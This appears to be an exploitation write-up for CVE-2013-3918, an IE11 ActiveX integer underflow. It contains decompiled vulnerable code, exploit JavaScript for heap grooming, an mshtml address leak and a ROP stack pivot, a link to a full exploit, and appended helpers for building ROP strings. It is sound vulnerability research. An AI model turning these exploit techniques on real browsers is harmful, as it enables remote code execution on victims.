# CVE-2013-3918 IE11 CardSpaceClaimCollection ActiveX Integer Underflow: Analysis and Exploitation

Published 2017-02-25 | Category: Exploitation

# 1. Vulnerability analysis

First attach WinDbg to the IE process and open the PoC page:

```html
```

Loading the page crashes IE; the fault is an access to memory that is not accessible:

![image_1b9o1mfmul5q1q4i1c2c1m497ba9.png-18.2kB][1]

The stack backtrace shows that the exception is raised inside `CCardSpaceClaimCollection::remove`:

![image_1b9o1resa19nl16rneahuam1og0m.png-25.7kB][2]

[1]: http://static.zybuluo.com/birdg0/0205ln6niau5e57lcaca9zfl/image_1b9o1mfmul5q1q4i1c2c1m497ba9.png
[2]: http://static.zybuluo.com/birdg0/c5merweql1is6iuxjxutvnyi/image_1b9o1resa19nl16rneahuam1og0m.png
[3]: https://github.com/exp-sky/XKungFoo-2013/blob/master/IE%200day%20Analysis%20And%20Exploit.pdf
[4]: http://boo0m.github.io/2016/12/20/%C2%96Geekpwn-2016-CVE-2013-3918-Exploit/
[5]: http://static.zybuluo.com/birdg0/auejwjk8q3huyeph69utojob/image_1b9pqottn1k1l1gjf1dhd10d01o6m9.png
[6]: http://static.zybuluo.com/birdg0/iu3at4dg8whad1d4qlwz606e/image_1b9ps0o9m12heeprc761o0253713.png
[7]: http://static.zybuluo.com/birdg0/h5jo6a1pvgga89sr9q1fm8ua/image_1b9ps9tcd17c0163kqfs15os1bdt1g.png
[8]: http://boo0m.github.io/2016/12/20/%C2%96Geekpwn-2016-CVE-2013-3918-Exploit/
[9]: https://github.com/birdg0/exp/blob/master/browser/ie11-cve-2013-3918-exp.html
[10]: https://github.com/exp-sky/XKungFoo-2013/blob/master/IE%200day%20Analysis%20And%20Exploit.pdf
[11]: http://boo0m.github.io/2016/12/20/%C2%96Geekpwn-2016-CVE-2013-3918-Exploit/

Next, open `icardie.dll` in IDA and look at `CCardSpaceClaimCollection::remove`:

```c
signed int __stdcall CCardSpaceClaimCollection::remove(CCardSpaceClaimCollection *this, struct tagVARIANT *var_index)
{
  signed int v2; // edi@1
  int v3; // eax@3
  CCardSpaceClaimCollection *this_object; // ebx@5
  tagSAFEARRAY *v5; // eax@7
  unsigned __int32 index; // esi@10
  int v8; // eax@18
  int this_object_size; // edx@23
  const struct _GUID *v10; // [sp+0h] [bp-18h]@0
  const struct _GUID *v11; // [sp+4h] [bp-14h]@0
  SAFEARRAYBOUND rgsabound; // [sp+Ch] [bp-Ch]@5
  char *ppvData; // [sp+14h] [bp-4h]@1
  SAFEARRAY *psa; // [sp+20h] [bp+8h]@7
  ...
  if ( var_index->vt != VT_I4 )
  {
    ...
  }
  index = var_index->cyVal.Lo;          // VT_I4 value used as unsigned __int32
  if ( index > this_object->size )      // off by one: index == size is accepted
  {
LABEL_11:
    v2 = -2147467259;                   // E_FAIL
    goto LABEL_12;
  }
LABEL_23:
  SysFreeString(*&ppvData[4 * index]);
  this_object_size = this_object->size;
  if ( index != this_object_size - 1 )
    memcpy(&ppvData[4 * index], &ppvData[4 * index + 4], 4 * (this_object_size - index));
  *&ppvData[4 * --this_object->size] = 0;   // size is decremented unconditionally
LABEL_12:
  if ( ppvData )
    SafeArrayUnaccessData(psa);
  if ( v2 < 0 )
    return ReportHR(&IID_ICardSpaceClaimCollection, v10, v11);
  return v2;
}
```

When `remove` is called with an integer argument, `index` is simply the value passed in, read as an `unsigned __int32`. The bounds check is `index > this_object->size` rather than `index >= size`, so an index equal to the current size is accepted; on an empty collection `remove(0)` therefore passes the check. Look at the code after `LABEL_23`: when the element being deleted is not the last one (`size - 1`), the remaining entries are shifted down with `memcpy`, and in every case the size is decremented. After the second `remove` in the PoC the collection size has become -1, i.e. `0xffffffff`. The next `remove(0)` again passes the check and executes `memcpy(&ppvData[0], &ppvData[4], 4 * 0xffffffff)` (a length of `0xfffffffc` after 32-bit truncation), which is the invalid memory access seen in the crash. Once the size is `0xffffffff` every index passes the check, including negative values such as `-88`, which is what the exploit below relies on.

# 2. Exploitation

The exploitation technique is explained in detail by exp-sky in [this PDF][3]; the exploit used here is the one from [boo0m's Geekpwn 2016 write-up][4].

```javascript
add_item(rc_obj0,"A",20);
add_item(rc_obj1,"B",20);
add_item(rc_obj2,"C",20);
// allocate a CSVGFilterElement (0x50 bytes) between the collections' allocations
var mysvg = document.getElementById("svg_my");
var filter = document.createElementNS("http://www.w3.org/2000/svg","filter");
mysvg.appendChild(filter);
add_item(rc_obj3,"D",20);
add_item(rc_obj4,"E",20);
add_item(rc_obj5,"F",20);
rc_obj5.remove(0);
// negative indices are reinterpreted as unsigned __int32 by remove() and
// pass the bounds check once the size has underflowed
rc_obj5.remove(-88);
rc_obj5.remove(-88);
for(var i=0; i< 20;i++) rc_obj5.remove(-110);
```

If the heap layout succeeds at this step, the first element of `rc_obj2` points at the `filter` element's vftable:

```
0:007> ln 718a7208
(718a7208)   MSHTML!CSVGFilterElement::`vftable'   |  (718a5930)   MSHTML!CSVGFilterElement::s_apHdlDescs
Exact matches:
    MSHTML!CSVGFilterElement::`vftable' = 
0:007> ? 
poi(718a7208) - mshtml
Evaluate expression: 6584541 = 006478dd
```

Reading `rc_obj2`'s first element as a string therefore returns the first DWORD of the vftable, the first virtual function pointer, which sits at `mshtml + 0x006478dd`. Subtracting that offset leaks the base address of `mshtml`:

```javascript
// first DWORD of the string, assembled little-endian from two UTF-16 code units
var function_addr = rc_obj2.item(0).charCodeAt(1)*65536+rc_obj2.item(0).charCodeAt(0);
var mshtml_addr = function_addr-0x006478dd;
```

The `svg filter` element is chosen because its object is exactly `0x50` bytes, the size needed for it to land in the freed slot:

![image_1b9pqottn1k1l1gjf1dhd10d01o6m9.png-26.6kB][5]

Next the ROP chain is built. After this step runs:

```javascript
add_item(rc_obj3, payload ,20);
rc_obj5.remove(-108);
rc_obj5.remove(-108);
for(var i=0;i<20;i++) rc_obj5.remove(-132);
```

the `filter` element's vftable pointer has been overwritten with the address of the `ROP + shellcode` string, and `eax` holds that string's address. When `filter.appendChild(table)` is called afterwards, execution starts at the gadget written by `payload += getDwordStr(mshtml_addr+0x00028cc4); //xchg eax,esp#retn`, which pivots the stack into the string. Note that the virtual call is protected by a vtable guard: `vtguard` is checked before the call is made, and the slot in question is at `vftable+0x48`:

![image_1b9ps0o9m12heeprc761o0253713.png-163.1kB][6]

Finally the ROP chain calls `VirtualProtect` to make the stack executable and runs the shellcode:

![image_1b9ps9tcd17c0163kqfs15os1bdt1g.png-70.7kB][7]

# 3. Full exploit

The IE version is `11.0.9600.16428`; only one place in [boo0m's exploit][8] was changed:

```html
```

Full exploit download: [https://github.com/birdg0/exp/blob/master/browser/ie11-cve-2013-3918-exp.html][9]

# 4. References

1. [https://github.com/exp-sky/XKungFoo-2013/blob/master/IE%200day%20Analysis%20And%20Exploit.pdf][10]
2. [http://boo0m.github.io/2016/12/20/%C2%96Geekpwn-2016-CVE-2013-3918-Exploit/][11]
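The following is an added example, not code from the original post or from the exploit it uses: a model of the arithmetic in the decompiled `CCardSpaceClaimCollection::remove` from section 1, replayed over a toy flat 32-bit memory so that the size underflow and the effect of the exploit's negative indices can be seen without a debugger. It assumes a `Uint32Array` standing in for the heap, an arbitrary chosen address for `ppvData`, pointer arithmetic that wraps modulo 2^32 as on the 32-bit target, and a PoC shape of one claim added followed by `remove(0)` three times; the real heap neighbours of the SAFEARRAY are not modelled.

```javascript
// Added example (not from the original post): model of the decompiled remove() arithmetic.
const E_FAIL = 0x80004005 | 0;        // -2147467259 in the decompilation
const S_OK = 0;
const MEM_BASE = 0x02000000;          // assumed start of the toy memory window
const MEM_WORDS = 0x400;              // 0x1000 bytes of modelled memory
const PPVDATA = MEM_BASE + 0x800;     // assumed address of the SAFEARRAY data (ppvData)

function makeMemory() {
  const mem = new Uint32Array(MEM_WORDS);
  for (let i = 0; i < MEM_WORDS; i++) mem[i] = (0x41000000 + i) >>> 0; // recognisable filler
  return mem;
}

// Map a 32-bit address to a DWORD index in the toy memory, or null if outside it.
function wordIndex(addr) {
  const off = (addr >>> 0) - MEM_BASE;
  return (off >= 0 && off + 4 <= 4 * MEM_WORDS && off % 4 === 0) ? off / 4 : null;
}
function peek(mem, addr) { const i = wordIndex(addr); return i === null ? null : mem[i]; }
function poke(mem, addr, v) { const i = wordIndex(addr); if (i !== null) mem[i] = v >>> 0; return i !== null; }

// One call of remove(varIndex) on `coll` ({size}). `fixed` switches the bounds check
// from the shipped `index > size` to the `index >= size` it should have been.
// Every memory-affecting step is appended to `log`, with addresses computed the way
// the 32-bit code computes them (wrapping at 2^32).
function removeClaim(mem, coll, varIndex, fixed, log) {
  const index = varIndex >>> 0;                   // VT_I4 value used as unsigned __int32
  const size = coll.size >>> 0;
  if (fixed ? index >= size : index > size) return E_FAIL;

  const slot = (PPVDATA + 4 * index) >>> 0;       // &ppvData[4 * index], wrapped
  log.push({ op: 'SysFreeString', addr: slot, freed: peek(mem, slot) });
  if (index !== ((size - 1) >>> 0)) {
    const len = (4 * (size - index)) >>> 0;       // 4 * (this_object_size - index), 32-bit
    const words = len / 4;
    const dst = wordIndex(slot);
    const inModel = dst !== null && dst + 1 + words <= MEM_WORDS;
    if (inModel) mem.copyWithin(dst, dst + 1, dst + 1 + words);   // memcpy(dst, dst + 4, len)
    log.push({ op: 'memcpy', dst: slot, src: (slot + 4) >>> 0, len, modelled: inModel });
  }
  coll.size = (size - 1) >>> 0;                   // --this_object->size, wraps to 0xffffffff from 0
  const zeroed = (PPVDATA + 4 * coll.size) >>> 0; // *&ppvData[4 * size] = 0
  poke(mem, zeroed, 0);
  log.push({ op: 'store0', addr: zeroed });
  return S_OK;
}

// Assumed PoC shape: one claim in the collection, then remove(0) three times.
function replayPoc(fixed) {
  const mem = makeMemory();
  const log = [];
  const coll = { size: 1 };
  const results = [0, 0, 0].map(() => removeClaim(mem, coll, 0, fixed, log));
  return { results, size: coll.size, log };
}

// What a single negative index does once the size has already underflowed.
function negativeIndexEffect(varIndex, size) {
  const mem = makeMemory();
  const log = [];
  const coll = { size };
  const rc = removeClaim(mem, coll, varIndex, false, log);
  return { rc, log, size: coll.size, offsetFromData: log[0].addr - PPVDATA };
}
```

With the shipped check, `replayPoc(false)` reports `S_OK` three times: the second `remove(0)` leaves `size` at `0xffffffff` and writes a zero DWORD at `ppvData - 4`, and the third computes a `memcpy` length of `0xfffffffc`, which the model refuses to perform. With `fixed = true` the second and third calls return `E_FAIL` and the size stays at zero. `negativeIndexEffect(-88, 0xffffffff)` shows what `rc_obj5.remove(-88)` does in the model: it frees the DWORD at `ppvData - 0x160`, shifts the `0x15c` bytes above it down by four, and zeroes the DWORD at `ppvData - 8`; what actually lives at those addresses depends on the heap layout the exploit sets up, which this model does not reproduce.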
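The following is an added example, not code from the original post or from the exploit it uses: the string-to-DWORD plumbing behind the `mshtml` leak and the `ROP + shellcode` string in section 2, generalised into reusable helpers. The `0x006478dd` offset (first `CSVGFilterElement` vftable slot) and the `0x00028cc4` offset (`xchg eax,esp ; retn`) are the values the post quotes for `mshtml.dll` of IE `11.0.9600.16428`; the base address used in `demo()` is constructed for the demonstration, and the second chain entry is a placeholder DWORD, not a real gadget or argument.

```javascript
// Added example (not from the original post): leak arithmetic and ROP string helpers.

// Two UTF-16 code units holding a DWORD little-endian, so that the first four
// payload bytes of the resulting BSTR are exactly `value` (the post's getDwordStr).
function getDwordStr(value) {
  const v = value >>> 0;
  return String.fromCharCode(v & 0xffff, v >>> 16);
}

// Inverse of getDwordStr for the n-th DWORD of a string; for n = 0 this is the
// post's  charCodeAt(1)*65536 + charCodeAt(0).
function readDword(s, n = 0) {
  return ((s.charCodeAt(2 * n + 1) << 16) | s.charCodeAt(2 * n)) >>> 0;
}

const SVG_FILTER_VTABLE_SLOT0_RVA = 0x006478dd;   // poi(CSVGFilterElement::`vftable') - mshtml
const XCHG_EAX_ESP_RET_RVA = 0x00028cc4;          // stack-pivot gadget offset quoted in the post

// rc_obj2.item(0) starts with the first vftable entry; subtracting its RVA gives the base.
function mshtmlBaseFromLeak(leakedStr) {
  return (readDword(leakedStr) - SVG_FILTER_VTABLE_SLOT0_RVA) >>> 0;
}

// Build the ROP string from a chain description: {rva} entries are rebased onto
// mshtml, {value} entries (API arguments, constants) are emitted verbatim.
function buildRopString(mshtmlBase, chain) {
  let s = '';
  for (const e of chain) {
    s += getDwordStr(e.rva !== undefined ? mshtmlBase + e.rva : e.value);
  }
  return s;
}

// Little-endian byte view of a string as it sits in a BSTR, for sanity checking.
function stringBytes(s) {
  const out = [];
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    out.push(c & 0xff, c >>> 8);
  }
  return out;
}

// Demonstration with a constructed base address (not a real load address).
function demo() {
  const base = 0x71240000;                                         // constructed
  const leaked = getDwordStr(base + SVG_FILTER_VTABLE_SLOT0_RVA);  // what item(0) would start with
  const recovered = mshtmlBaseFromLeak(leaked);
  const rop = buildRopString(recovered, [
    { rva: XCHG_EAX_ESP_RET_RVA },   // pivot: eax holds the string address, esp := eax
    { value: 0x40 },                 // placeholder DWORD standing in for a chain argument
  ]);
  return { recovered, rop, bytes: stringBytes(rop) };
}
```

JavaScript strings may contain U+0000 code units and a BSTR is length-prefixed, so DWORDs with zero bytes (small constants, addresses ending in `00`) encode without truncation; `stringBytes` makes that visible when checking a chain before handing it to `add_item`.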